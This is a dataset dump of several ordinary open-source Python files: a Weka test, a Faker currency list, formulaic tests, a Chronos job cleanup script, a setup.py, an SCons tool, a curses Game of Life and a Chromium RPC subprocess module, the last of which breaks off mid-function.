| text (string, length 6-947k) | repo_name (string, length 5-100) | path (string, length 4-231) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) |
|---|---|---|---|---|---|---|
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# experiments.py
# Copyright (C) 2015 Fracpete (pythonwekawrapper at gmail dot com)
import unittest
import weka.core.jvm as jvm
import weka.core.converters as converters
import weka.classifiers as classifiers
import weka.experiments as experiments
import weka.plot.experiments as plot
import wekatests.tests.weka_test as weka_test
class TestExperiments(weka_test.WekaTest):
def test_plot_experiment(self):
"""
Tests the plot_experiment method.
"""
datasets = [self.datafile("bolts.arff"), self.datafile("bodyfat.arff"), self.datafile("autoPrice.arff")]
cls = [
classifiers.Classifier("weka.classifiers.trees.REPTree"),
classifiers.Classifier("weka.classifiers.functions.LinearRegression"),
classifiers.Classifier("weka.classifiers.functions.SMOreg"),
]
outfile = self.tempfile("results-rs.arff")
exp = experiments.SimpleRandomSplitExperiment(
classification=False,
runs=10,
percentage=66.6,
preserve_order=False,
datasets=datasets,
classifiers=cls,
result=outfile)
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
matrix = experiments.ResultMatrix("weka.experiment.ResultMatrixPlainText")
tester = experiments.Tester("weka.experiment.PairedCorrectedTTester")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Correlation_coefficient").index
tester.instances = data
tester.header(comparison_col)
tester.multi_resultset_full(0, comparison_col)
# plot
plot.plot_experiment(matrix, title="Random split (w/ StdDev)", measure="Correlation coefficient", show_stdev=True, wait=False)
plot.plot_experiment(matrix, title="Random split", measure="Correlation coefficient", wait=False)
def suite():
"""
Returns the test suite.
:return: the test suite
:rtype: unittest.TestSuite
"""
return unittest.TestLoader().loadTestsFromTestCase(TestExperiments)
if __name__ == '__main__':
jvm.start()
unittest.TextTestRunner().run(suite())
jvm.stop()
| nvoron23/python-weka-wrapper | tests/wekatests/plottests/experiments.py | Python | gpl-3.0 | 2,900 | 0.002759 |
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "Dírham de los Emiratos Árabes Unidos"),
("AFN", "Afghaní"),
("ALL", "Lek albanés"),
("AMD", "Dram armenio"),
("ANG", "Florín de las Antillas Holandesas"),
("AOA", "Kwanza angoleño"),
("ARS", "Peso argentino"),
("AUD", "Dólar australiano"),
("AWG", "Florín arubeño"),
("AZN", "Manat azerbaiyano"),
("BAM", "Marco bosnioherzegovino"),
("BBD", "Dólar barbadense"),
("BDT", "Taka bangladesí"),
("BGN", "Lev búlgaro"),
("BHD", "Dinar bahreiní"),
("BIF", "Franco burundés"),
("BMD", "Dólar de Bermudas"),
("BND", "Dólar bruneano"),
("BOB", "Boliviano"),
("BRL", "Real brasileño"),
("BSD", "Dólar bahameño"),
("BTN", "Ngultrum butanés"),
("BWP", "Pula de Botswana"),
("BYR", "Rublio bielurruso"),
("BZD", "Dólar beliceño"),
("CAD", "Dólar canadiense"),
("CDF", "Franco congolés"),
("CHF", "Franco suizo"),
("CLP", "Peso chileno"),
("CNY", "Yuan"),
("COP", "Peso colombiano"),
("CRC", "Colón costarricense"),
("CUC", "Peso cubano convertible"),
("CUP", "Peso subano"),
("CVE", "Escudo de Cabo Verde"),
("CZK", "Corona checa"),
("DJF", "Franco yibutiano"),
("DKK", "Corona danesa"),
("DOP", "Peso dominicano"),
("DZD", "Dinar argelino"),
("EGP", "Libra egipcia"),
("ERN", "Nafka"),
("ETB", "Bir de Etiopía"),
("EUR", "Euro"),
("FJD", "Dólar fiyiano"),
("FKP", "Libra de las islas Falkland"),
("GBP", "Libra esterlina"),
("GEL", "Larí georgiano"),
("GGP", "Libra de Guernsey"),
("GHS", "Cedi"),
("GIP", "Libra de Gibraltar"),
("GMD", "Dalasi"),
("GNF", "Franco guineano"),
("GTQ", "Quetzal guatemalteco"),
("GYD", "Dólar guyanés"),
("HKD", "Dólar hongkonés"),
("HNL", "Lempira hondureño"),
("HRK", "Kuna croata"),
("HTG", "Gourde haitiano"),
("HUF", "Forinto húngaro"),
("IDR", "Rupia indonesia"),
("ILS", "Séquel israelí"),
("NIS", "Nuevo Séquel israelí"),
("IMP", "Libra manesa"),
("INR", "Rupia india"),
("IQD", "Dinar iraquí"),
("IRR", "Rial iraní"),
("ISK", "Corona islandesa"),
("JEP", "Libra de Jersey"),
("JMD", "Dólar jamaicano"),
("JOD", "Dinar jordano"),
("JPY", "Yen japonés"),
("KES", "Chelín keniano"),
("KGS", "Som kirguís"),
("KHR", "Riel camboyano"),
("KMF", "Franco comorense"),
("KPW", "Won norcoreano"),
("KRW", "Krahn Occidental"),
("KWD", "Dinar kuwaití"),
("KYD", "Dólar de las islas Cayman"),
("KZT", "Tenge kazako"),
("LAK", "Kip laosiano"),
("LBP", "Libra libanesa"),
("LKR", "Rupia esrilanquesa"),
("LRD", "Dólar liberiano"),
("LSL", "Loti lesothense"),
("LTL", "Litas lituana"),
("LYD", "Dinar libio"),
("MAD", "Dirham marroquí"),
("MDL", "Leu moldavo"),
("MGA", "Ariary malgache"),
("MKD", "Denar normacedonio"),
("MMK", "Kyat birmano"),
("MNT", "Tugrik mongol"),
("MOP", "Pataca macaense"),
("MRO", "Ouguiya mauritano"),
("MUR", "Rupia mauritana"),
("MVR", "Rupia de Maldivas"),
("MWK", "Kwacha malauí"),
("MXN", "Peso mexicano"),
("MYR", "Ringgit"),
("MZN", "Metical mozambiqueño"),
("NAD", "Dólar namibio"),
("NGN", "Naira nigeriano"),
("NIO", "Córdoba nicaragüense"),
("NOK", "Corona noruega"),
("NPR", "Rupia nepalí"),
("NZD", "Dólar neozelandés"),
("OMR", "Rial omaní"),
("PAB", "Balboa panameño"),
("PEN", "Sol peruano"),
("PGK", "Kina"),
("PHP", "Peso filipino"),
("PKR", "Rupia pakistaní"),
("PLN", "Złoty polaco"),
("PYG", "Guaraní paraguayo"),
("QAR", "Riyal catarí"),
("RON", "Leu rumano"),
("RSD", "Dinar serbio"),
("RUB", "Rublo ruso"),
("RWF", "Franco ruandés"),
("SAR", "Riyal saudí"),
("SBD", "Dólar de las islas Solomon"),
("SCR", "Rupia seychellense"),
("SDG", "Libra sudanesa"),
("SEK", "Corona sueca"),
("SGD", "Dólar de Singapur"),
("SHP", "Libra de Santa Elena"),
("SLL", "Leona"),
("SOS", "Chelín somalí"),
("SPL", "Luigino"),
("SRD", "Dólar surinamés"),
("STD", "Dobra santotomense"),
("SVC", "Colón salvadoreño"),
("SYP", "Libra siria"),
("SZL", "Lilangeni"),
("THB", "Baht tailandés"),
("TJS", "Somoni tayiko"),
("TMT", "Manat turcomano"),
("TND", "Dinar tunecino"),
("TOP", "Pa'anga tongano"),
("TRY", "Lira turca"),
("TTD", "Dólar de Trinidad and Tobago"),
("TVD", "Dólar tuvaluano"),
("TWD", "Nuevo dólar taiwanés"),
("TZS", "Chelín tanzano"),
("UAH", "Grivna ucraniano"),
("UGX", "Chelín ugandés"),
("USD", "Dólar de Estados Unidos"),
("UYU", "Peso uruguayo"),
("UZS", "Soʻm Uzbekistani"),
("VEF", "Bolívar venezolano"),
("VND", "Đồng vietnamita"),
("VUV", "Vanuatu vatu"),
("WST", "Tālā samoano"),
("XAF", "Franco centro africano"),
("XCD", "Dólar del Caribe Oriental"),
("XDR", "Derechos especiales de giro"),
("XOF", "Franco de África occidental"),
("XPF", "Franco CFP"),
("YER", "Rial yemení"),
("ZAR", "Rand sudafricano"),
("ZMW", "Kwacha zambiano"),
("ZWD", "Dólar zimbabuense"),
)
price_formats = ["#,##", "%#,##", "%##,##", "%.###,##", "%#.###,##"]
def pricetag(self) -> str:
return self.numerify(self.random_element(self.price_formats)) + "\N{no-break space}\N{euro sign}"
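# Hedged note (an assumption about Faker's standard numerify placeholders, not
# stated in this file): '#' expands to a random digit and '%' to a random
# non-zero digit, so pricetag() returns strings such as '3.456,78' followed by
# a no-break space and the euro sign. The sample value is illustrative only.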
| joke2k/faker | faker/providers/currency/es_ES/__init__.py | Python | mit | 6,293 | 0.000161 |
import pytest
from formulaic.parser.types import Factor, Term
class TestTerm:
@pytest.fixture
def term1(self):
return Term([Factor("c"), Factor("b")])
@pytest.fixture
def term2(self):
return Term([Factor("c"), Factor("d")])
@pytest.fixture
def term3(self):
return Term([Factor("a"), Factor("b"), Factor("c")])
def test_mul(self, term1, term2):
assert str(term1 * term2) == "b:c:d"
with pytest.raises(TypeError):
term1 * 1
def test_hash(self, term1):
assert hash(term1) == hash("b:c")
def test_equality(self, term1, term2):
assert term1 == term1
assert term1 == "b:c"
assert term1 != term2
assert term1 != 1
def test_sort(self, term1, term2, term3):
assert term1 < term2
assert term2 < term3
assert term1 < term3
assert not (term3 < term1)
with pytest.raises(TypeError):
term1 < 1
def test_repr(self, term1):
assert repr(term1) == "b:c"
| matthewwardrop/formulaic | tests/parser/types/test_term.py | Python | mit | 1,044 | 0 |
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./cleanup_chronos_jobs.py [options]
Clean up chronos jobs that aren't supposed to run on this cluster by deleting them.
Gets the current job list from chronos, and then a 'valid_job_list'
via chronos_tools.get_chronos_jobs_for_cluster.
If a job is deployed by chronos but not in the expected list, it is deleted.
Any tasks associated with that job are also deleted.
- -d <SOA_DIR>, --soa-dir <SOA_DIR>: Specify a SOA config dir to read from
"""
import argparse
import datetime
import sys
import dateutil.parser
import pysensu_yelp
from paasta_tools import chronos_tools
from paasta_tools import monitoring_tools
from paasta_tools import utils
from paasta_tools.check_chronos_jobs import check_chronos_job_name
from paasta_tools.utils import InvalidJobNameError
from paasta_tools.utils import NoConfigurationForServiceError
from paasta_tools.utils import paasta_print
def parse_args():
parser = argparse.ArgumentParser(description='Cleans up stale chronos jobs.')
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=chronos_tools.DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
args = parser.parse_args()
return args
def execute_chronos_api_call_for_job(api_call, job):
"""Attempt a call to the Chronos api, catching any exception.
We *have* to catch Exception, because the client catches
the more specific exception thrown by the http clients
and rethrows an Exception -_-.
The chronos api returns a 204 No Content when the delete is
successful, and chronos-python only returns the body of the
response from all http calls. So, if this is successful,
then None will be returned.
https://github.com/asher/chronos-python/pull/7
We catch it here, so that the other deletes are completed.
"""
try:
return api_call(job)
except Exception as e:
return e
def cleanup_jobs(client, jobs):
"""Maps a list of jobs to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete, job)) for job in jobs]
def cleanup_tasks(client, jobs):
"""Maps a list of tasks to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete_tasks, job)) for job in jobs]
def format_list_output(title, job_names):
return '%s\n %s' % (title, '\n '.join(job_names))
def deployed_job_names(client):
return [job['name'] for job in client.list()]
def filter_paasta_jobs(jobs):
"""
Given a list of job name strings, return only those in the format PaaSTA expects.
:param jobs: a list of job names.
:returns: those job names in a format PaaSTA expects
"""
formatted = []
for job in jobs:
try:
# attempt to decompose it
service, instance = chronos_tools.decompose_job_id(job)
formatted.append(job)
except InvalidJobNameError:
pass
return formatted
def filter_tmp_jobs(job_names):
"""
filter temporary jobs created by chronos_rerun
"""
return [name for name in job_names if name.startswith(chronos_tools.TMP_JOB_IDENTIFIER)]
def filter_expired_tmp_jobs(client, job_names, cluster, soa_dir):
"""
Given a list of temporary jobs, find those ready to be removed. Their
suitability for removal is defined by two things:
- the job has completed (irrespective of whether it was a success or
failure)
- the job completed longer ago than the greater of its schedule interval
and 24 hours
"""
expired = []
for job_name in job_names:
service, instance = chronos_tools.decompose_job_id(job_name)
temporary_jobs = chronos_tools.get_temporary_jobs_for_service_instance(
client=client,
service=service,
instance=instance,
)
for job in temporary_jobs:
last_run_time, last_run_state = chronos_tools.get_status_last_run(job)
try:
chronos_job_config = chronos_tools.load_chronos_job_config(
service=service,
instance=instance,
cluster=cluster,
soa_dir=soa_dir,
)
interval = chronos_job_config.get_schedule_interval_in_seconds() or 0
except NoConfigurationForServiceError:
# If we can't get the job's config, default to cleanup after 1 day
interval = 0
if last_run_state != chronos_tools.LastRunState.NotRun:
if ((datetime.datetime.now(dateutil.tz.tzutc()) -
dateutil.parser.parse(last_run_time)) >
max(datetime.timedelta(seconds=interval), datetime.timedelta(days=1))):
expired.append(job_name)
return expired
def main():
args = parse_args()
soa_dir = args.soa_dir
config = chronos_tools.load_chronos_config()
client = chronos_tools.get_chronos_client(config)
system_paasta_config = utils.load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
running_jobs = set(deployed_job_names(client))
expected_service_jobs = {chronos_tools.compose_job_id(*job) for job in
chronos_tools.get_chronos_jobs_for_cluster(soa_dir=args.soa_dir)}
all_tmp_jobs = set(filter_tmp_jobs(filter_paasta_jobs(running_jobs)))
expired_tmp_jobs = set(filter_expired_tmp_jobs(client, all_tmp_jobs, cluster=cluster, soa_dir=soa_dir))
valid_tmp_jobs = all_tmp_jobs - expired_tmp_jobs
to_delete = running_jobs - expected_service_jobs - valid_tmp_jobs
task_responses = cleanup_tasks(client, to_delete)
task_successes = []
task_failures = []
for response in task_responses:
if isinstance(response[-1], Exception):
task_failures.append(response)
else:
task_successes.append(response)
job_responses = cleanup_jobs(client, to_delete)
job_successes = []
job_failures = []
for response in job_responses:
if isinstance(response[-1], Exception):
job_failures.append(response)
else:
job_successes.append(response)
try:
(service, instance) = chronos_tools.decompose_job_id(response[0])
monitoring_tools.send_event(
check_name=check_chronos_job_name(service, instance),
service=service,
overrides={},
soa_dir=soa_dir,
status=pysensu_yelp.Status.OK,
output="This instance was removed and is no longer supposed to be scheduled.",
)
except InvalidJobNameError:
# If we deleted some bogus job with a bogus jobid that could not be parsed,
# Just move on, no need to send any kind of paasta event.
pass
if len(to_delete) == 0:
paasta_print('No Chronos Jobs to remove')
else:
if len(task_successes) > 0:
paasta_print(format_list_output(
"Successfully Removed Tasks (if any were running) for:",
[job[0] for job in task_successes],
))
# if there are any failures, print and exit appropriately
if len(task_failures) > 0:
paasta_print(format_list_output("Failed to Delete Tasks for:", [job[0] for job in task_failures]))
if len(job_successes) > 0:
paasta_print(format_list_output("Successfully Removed Jobs:", [job[0] for job in job_successes]))
# if there are any failures, print and exit appropriately
if len(job_failures) > 0:
paasta_print(format_list_output("Failed to Delete Jobs:", [job[0] for job in job_failures]))
if len(job_failures) > 0 or len(task_failures) > 0:
sys.exit(1)
if __name__ == "__main__":
main()
| somic/paasta | paasta_tools/cleanup_chronos_jobs.py | Python | apache-2.0 | 8,610 | 0.002323 |
#!/usr/bin/env python
import io
import os
import sys
from efesto.Version import version
from setuptools import find_packages, setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
os.system('python setup.py bdist_wheel upload')
sys.exit()
readme = io.open('README.md', 'r', encoding='utf-8').read()
setup(
name='efesto',
description='RESTful (micro)server that can generate an API in minutes.',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/getefesto/efesto',
author='Jacopo Cascioli',
author_email='noreply@jacopocascioli.com',
license='GPL3',
version=version,
packages=find_packages(),
tests_require=[
'pytest',
'pytest-mock',
'pytest-falcon'
],
setup_requires=['pytest-runner'],
install_requires=[
'falcon>=1.4.1',
'falcon-cors>=1.1.7',
'psycopg2-binary>=2.7.5',
'peewee>=3.7.1',
'click==6.7',
'colorama>=0.4.0',
'aratrum>=0.3.2',
'python-rapidjson>=0.6.3',
'pyjwt>=1.6.4',
'ruamel.yaml>=0.15.74'
],
classifiers=[
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
],
entry_points="""
[console_scripts]
efesto=efesto.Cli:Cli.main
"""
)
| getefesto/efesto | setup.py | Python | gpl-3.0 | 1,723 | 0 |
"""SCons.Tool.sunf90
Tool-specific initialization for sunf90, the Sun Studio F90 compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunf90.py 2014/03/02 14:18:15 garyo"
import SCons.Util
from FortranCommon import add_all_to_env
compilers = ['sunf90', 'f90']
def generate(env):
"""Add Builders and construction variables for sun f90 compiler to an
Environment."""
add_all_to_env(env)
fcomp = env.Detect(compilers) or 'f90'
env['FORTRAN'] = fcomp
env['F90'] = fcomp
env['SHFORTRAN'] = '$FORTRAN'
env['SHF90'] = '$F90'
env['SHFORTRANFLAGS'] = SCons.Util.CLVar('$FORTRANFLAGS -KPIC')
env['SHF90FLAGS'] = SCons.Util.CLVar('$F90FLAGS -KPIC')
def exists(env):
return env.Detect(compilers)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| michalliu/OpenWrt-Firefly-Libraries | staging_dir/host/lib/scons-2.3.1/SCons/Tool/sunf90.py | Python | gpl-2.0 | 2,198 | 0.003185 |
#!/usr/bin/env python3
'''Conway's Game of Life in a Curses Terminal Window
'''
import curses
import time
from GameOfLife import NumpyWorld
from GameOfLife import Patterns
from curses import ( COLOR_BLACK, COLOR_BLUE, COLOR_CYAN,
COLOR_GREEN, COLOR_MAGENTA, COLOR_RED,
COLOR_WHITE, COLOR_YELLOW )
class CursesWorld(NumpyWorld):
'''
Display a Game of Life in a terminal window using curses.
'''
colors = [COLOR_WHITE,COLOR_YELLOW,COLOR_MAGENTA,
COLOR_CYAN,COLOR_RED,COLOR_GREEN,COLOR_BLUE]
def __init__(self,window):
'''
:param: window - curses window
'''
h,w = window.getmaxyx()
super(CursesWorld,self).__init__(w,h-1)
self.w = window
self.interval = 0
for n,fg in enumerate(self.colors):
curses.init_pair(n+1,fg,COLOR_BLACK)
@property
def gps(self):
'''
Generations per second.
'''
try:
return self._gps
except AttributeError:
pass
self._gps = 0
return self._gps
@gps.setter
def gps(self,newValue):
self._gps = int(newValue)
def colorForCell(self,age):
'''
Returns a curses color_pair for a cell, chosen by the cell's age.
'''
n = min(age // 100,len(self.colors)-1)
return curses.color_pair(n+1)
def handle_input(self):
'''
Accepts input from the user and acts on it.
Key Action
-----------------
q exit()
Q exit()
+ increase redraw interval by 10 milliseconds
- decrease redraw interval by 10 milliseconds
'''
c = self.w.getch()
if c == ord('q') or c == ord('Q'):
exit()
if c == ord('+'):
self.interval += 10
if c == ord('-'):
self.interval -= 10
if self.interval < 0:
self.interval = 0
@property
def status(self):
'''
Format string for the status line.
'''
try:
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
except AttributeError:
pass
s = ['Q to quit\t',
'{self.generation:>10} G',
'{self.gps:>4} G/s',
'Census: {a:>5}/{t:<5}',
'{self.interval:>4} ms +/-']
self._status = ' '.join(s)
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
def draw(self):
'''
:return: None
Updates each character in the curses window with
the appropriate colored marker for each cell in the world.
Moves the cursor to bottom-most line, left-most column
when finished.
'''
for y in range(self.height):
for x in range(self.width):
c = self[x,y]
self.w.addch(y,x,self.markers[c > 0],self.colorForCell(c))
self.w.addstr(self.height,2,self.status)
self.w.move(self.height,1)
def run(self,stop=-1,interval=0):
'''
:param: stop - optional integer
:param: interval - optional integer
:return: None
This method will run the simulation described by world until the
given number of generations specified by ''stop'' has been met.
The default value will cause the simulation to run until interrupted
by the user.
The interval is number of milliseconds to pause between generations.
The default value of zero allows the simulation to run as fast as
possible.
The simulation is displayed via curses in a terminal window and
displays a status line at the bottom of the window.
The simulation can be stopped by the user pressing the keys 'q' or
'Q'. The interval between simulation steps can be increased with
the plus key '+' or decreased with the minus key '-' by increments
of 10 milliseconds.
'''
self.w.clear()
self.interval = interval
try:
while True:
if self.generation == stop:
break
self.handle_input()
t0 = time.time()
self.step()
self.draw()
self.w.refresh()
if self.interval:
curses.napms(self.interval)
t1 = time.time()
self.gps = 1/(t1-t0)
except KeyboardInterrupt:
pass
def main(stdscr,argv):
w = CursesWorld(stdscr)
if len(argv) == 1:
raise ValueError("no patterns specified.")
for thing in argv[1:]:
name,_,where = thing.partition(',')
try:
x,y = map(int,where.split(','))
except:
x,y = 0,0
w.addPattern(Patterns[name],x=x,y=y)
stdscr.nodelay(True)
w.run()
def usage(argv,msg=None,exit_value=-1):
usagefmt = 'usage: {name} [[pattern_name],[X,Y]] ...'
namefmt = '\t{n}'
print(usagefmt.format(name=os.path.basename(argv[0])))
if msg:
print(msg)
print('pattern names:')
[print(namefmt.format(n=name)) for name in Patterns.keys()]
exit(exit_value)
if __name__ == '__main__':
import sys
import os
from curses import wrapper
try:
wrapper(main,sys.argv)
except KeyError as e:
usage(sys.argv,'unknown pattern {p}'.format(p=str(e)))
except ValueError as e:
usage(sys.argv,str(e))
| JnyJny/GameOfLife | contrib/NCGameOfLife.py | Python | mit | 5,897 | 0.010853 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""RPC compatible subprocess-type module.
This module defines both a task-side process class and a controller-side
process wrapper for easier access and usage of the task-side process.
"""
import logging
import os
import subprocess
import sys
import threading
import time
#pylint: disable=relative-import
import common_lib
# Map swarming_client to use subprocess42
sys.path.append(common_lib.SWARMING_DIR)
from utils import subprocess42
class TimeoutError(Exception):
pass
class ControllerProcessWrapper(object):
"""Controller-side process wrapper class.
This class provides a more intuitive interface to task-side processes
than calling the methods directly using the RPC object.
"""
def __init__(self, rpc, cmd, verbose=False, detached=False, cwd=None,
key=None, shell=None):
logging.debug('Creating a process with cmd=%s', cmd)
self._rpc = rpc
self._key = rpc.subprocess.Process(cmd, key)
logging.debug('Process created with key=%s', self._key)
if verbose:
self._rpc.subprocess.SetVerbose(self._key)
if detached:
self._rpc.subprocess.SetDetached(self._key)
if cwd:
self._rpc.subprocess.SetCwd(self._key, cwd)
if shell:
self._rpc.subprocess.SetShell(self._key)
self._rpc.subprocess.Start(self._key)
@property
def key(self):
return self._key
def Terminate(self):
logging.debug('Terminating process %s', self._key)
return self._rpc.subprocess.Terminate(self._key)
def Kill(self):
logging.debug('Killing process %s', self._key)
self._rpc.subprocess.Kill(self._key)
def Delete(self):
return self._rpc.subprocess.Delete(self._key)
def GetReturncode(self):
return self._rpc.subprocess.GetReturncode(self._key)
def ReadStdout(self):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
return self._rpc.subprocess.ReadStdout(self._key)
def ReadStderr(self):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadStderr(self._key)
def ReadOutput(self):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadOutput(self._key)
def Wait(self, timeout=None):
return self._rpc.subprocess.Wait(self._key, timeout)
def Poll(self):
return self._rpc.subprocess.Poll(self._key)
def GetPid(self):
return self._rpc.subprocess.GetPid(self._key)
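# Hedged controller-side sketch (an assumption, not part of the original file):
# how ControllerProcessWrapper is meant to be driven once an RPC proxy exposing
# rpc.subprocess.* is available. The 'rpc' argument and the command are illustrative.
def _example_controller_usage(rpc):
    proc = ControllerProcessWrapper(rpc, ['echo', 'hello'], verbose=True)
    proc.Wait(timeout=30)                # blocks until the task-side process completes
    stdout, stderr = proc.ReadOutput()   # drains output buffered since the last read
    returncode = proc.GetReturncode()
    proc.Delete()                        # removes the task-side entry (killing it if needed)
    return returncode, stdout, stderr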
class Process(object):
"""Implements a task-side non-blocking subprocess.
This non-blocking subprocess allows the caller to continue operating while
still being able to interact with the subprocess through a key returned to
the caller at the time of creation.
Creation args are set via Set* methods called after calling Process but
before calling Start. This is due to a limitation of the XML-RPC
implementation not supporting keyword arguments.
"""
_processes = {}
_process_next_id = 0
_creation_lock = threading.Lock()
def __init__(self, cmd, key):
self.stdout = ''
self.stderr = ''
self.key = key
self.cmd = cmd
self.proc = None
self.cwd = None
self.shell = False
self.verbose = False
self.detached = False
self.complete = False
self.data_lock = threading.Lock()
self.stdout_file = open(self._CreateOutputFilename('stdout'), 'wb+')
self.stderr_file = open(self._CreateOutputFilename('stderr'), 'wb+')
def _CreateOutputFilename(self, fname):
return os.path.join(common_lib.GetOutputDir(), '%s.%s' % (self.key, fname))
def __str__(self):
return '%r, cwd=%r, verbose=%r, detached=%r' % (
self.cmd, self.cwd, self.verbose, self.detached)
def _reader(self):
for pipe, data in self.proc.yield_any():
with self.data_lock:
if pipe == 'stdout':
self.stdout += data
self.stdout_file.write(data)
self.stdout_file.flush()
if self.verbose:
sys.stdout.write(data)
else:
self.stderr += data
self.stderr_file.write(data)
self.stderr_file.flush()
if self.verbose:
sys.stderr.write(data)
self.complete = True
@classmethod
def KillAll(cls):
for key in cls._processes:
cls.Kill(key)
@classmethod
def Process(cls, cmd, key=None):
with cls._creation_lock:
if not key:
key = 'Process%d' % cls._process_next_id
cls._process_next_id += 1
if key in cls._processes:
raise KeyError('Key %s already in use' % key)
logging.debug('Creating process %s with cmd %r', key, cmd)
cls._processes[key] = cls(cmd, key)
return key
def _Start(self):
logging.info('Starting process %s', self)
self.proc = subprocess42.Popen(self.cmd, stdout=subprocess42.PIPE,
stderr=subprocess42.PIPE,
detached=self.detached, cwd=self.cwd,
shell=self.shell)
threading.Thread(target=self._reader).start()
@classmethod
def Start(cls, key):
cls._processes[key]._Start()
@classmethod
def SetCwd(cls, key, cwd):
"""Sets the process's cwd."""
logging.debug('Setting %s cwd to %s', key, cwd)
cls._processes[key].cwd = cwd
@classmethod
def SetShell(cls, key):
"""Sets the process's shell arg to True."""
logging.debug('Setting %s.shell = True', key)
cls._processes[key].shell = True
@classmethod
def SetDetached(cls, key):
"""Creates a detached process."""
logging.debug('Setting %s.detached = True', key)
cls._processes[key].detached = True
@classmethod
def SetVerbose(cls, key):
"""Sets the stdout and stderr to be emitted locally."""
logging.debug('Setting %s.verbose = True', key)
cls._processes[key].verbose = True
@classmethod
def Terminate(cls, key):
logging.debug('Terminating process %s', key)
cls._processes[key].proc.terminate()
@classmethod
def Kill(cls, key):
logging.debug('Killing process %s', key)
cls._processes[key].proc.kill()
@classmethod
def Delete(cls, key):
if cls.GetReturncode(key) is None:
logging.warning('Killing %s before deleting it', key)
cls.Kill(key)
logging.debug('Deleting process %s', key)
cls._processes.pop(key)
@classmethod
def GetReturncode(cls, key):
return cls._processes[key].proc.returncode
@classmethod
def ReadStdout(cls, key):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stdout data
stdout = proc.stdout
proc.stdout = ''
return stdout
@classmethod
def ReadStderr(cls, key):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stderr data
stderr = proc.stderr
proc.stderr = ''
return stderr
@classmethod
def ReadOutput(cls, key):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return cls.ReadStdout(key), cls.ReadStderr(key)
@classmethod
def Wait(cls, key, timeout=None):
"""Wait for the process to complete.
We wait for all of the output to be written before returning. This solves
a race condition found on Windows where the output can lag behind the
wait call.
Raises:
TimeoutError if the process doesn't finish in the specified timeout.
"""
end = None if timeout is None else timeout + time.time()
while end is None or end > time.time():
